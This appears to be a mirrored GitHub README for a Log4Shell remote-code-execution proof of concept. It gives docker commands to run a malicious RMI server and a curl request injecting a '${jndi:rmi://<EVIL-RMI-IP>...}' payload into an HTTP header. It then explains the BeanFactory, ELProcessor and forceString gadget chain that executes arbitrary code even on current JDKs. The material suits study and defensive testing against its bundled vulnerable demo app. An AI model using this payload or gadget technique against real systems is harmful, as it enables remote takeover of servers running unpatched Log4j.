GithubHelp home page GithubHelp logo

jermainlaforce / log4shell_poc Goto Github PK

View Code? Open in Web Editor NEW

This project forked from drahosj/log4shell_poc

0.0 0.0 0.0 8 KB

Log4Shell RCE exploit using a gadget class. Not dependent on an old JDK version to work.

Dockerfile 8.77% Java 91.23%

log4shell_poc's Introduction

$ docker build -t evil:latest .
$ docker run -p 1097:1097 evil:latest

////////

# vulnerable application container is also running
$ curl 127.0.0.1:8080 -H 'X-Api-Version: ${jndi:rmi://<EVIL-RMI-IP>:1097/Object}'

https://github.com/drahosj/log4shell-vulnerable-app

credit: https://www.veracode.com/blog/research/exploiting-jndi-injections-java


///////

Actual notes:

Uses the technique (BeanFactory + ELProcessor + "forceString") highlighted 
in https://www.veracode.com/blog/research/exploiting-jndi-injections-java. The
tl;dr on that:

1. A ResourceRef overrides the normal JNDI reference behavior with a set of
key=value pairs intended to populate a Bean via setters
2. Java stil lets you specify a custom factor, if that factory is in the
classpath.
3. BeanFactory works with ResourceRefs to call the setters and populate the new
bean.
4. the forceString directive in a ResourceRef lets you override the name of a
setter from setFoo to anything you want; when assigning foo it will call that
name.
5. the ELProcessor class works as a gadget, since its eval method is a valid
bean setter (though named incorrectly). 
6. Create a forceString rule to set "x" by calling "eval" - x doesn't even have
to be a real field of ELProcessor
7. Try to set x to a string
8. BeanFactory calls ELProcessor.eval() on the string, because forceString makes
eval() the setter for x
9. Execute arbitrary EL

Other gadget classes probably exist. This demo only works against a patched
version of the vulnerable app that hacks the gadget classes into the classpath.
Note that it's not entirely unreasonable for the relevant jars to be included -
any full tomcat deployment (not just spring-boot's embedded tomcat) will
definitely have them.

- A note on Java versions
Using gadgets seems to be possible even on the most current java, and
the gadgets still exist on current versions of stuff.

This compiles with a slightly older JDK just to avoid problems with the
"internal and proprietary" ReferenceWrapper class. Recent JDKs really complain
about that a lot - easiest solution is to just stick to one that doesn't.

log4shell_poc's People

Contributors

drahosj avatar

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    ๐Ÿ–– Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. ๐Ÿ“Š๐Ÿ“ˆ๐ŸŽ‰

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google โค๏ธ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.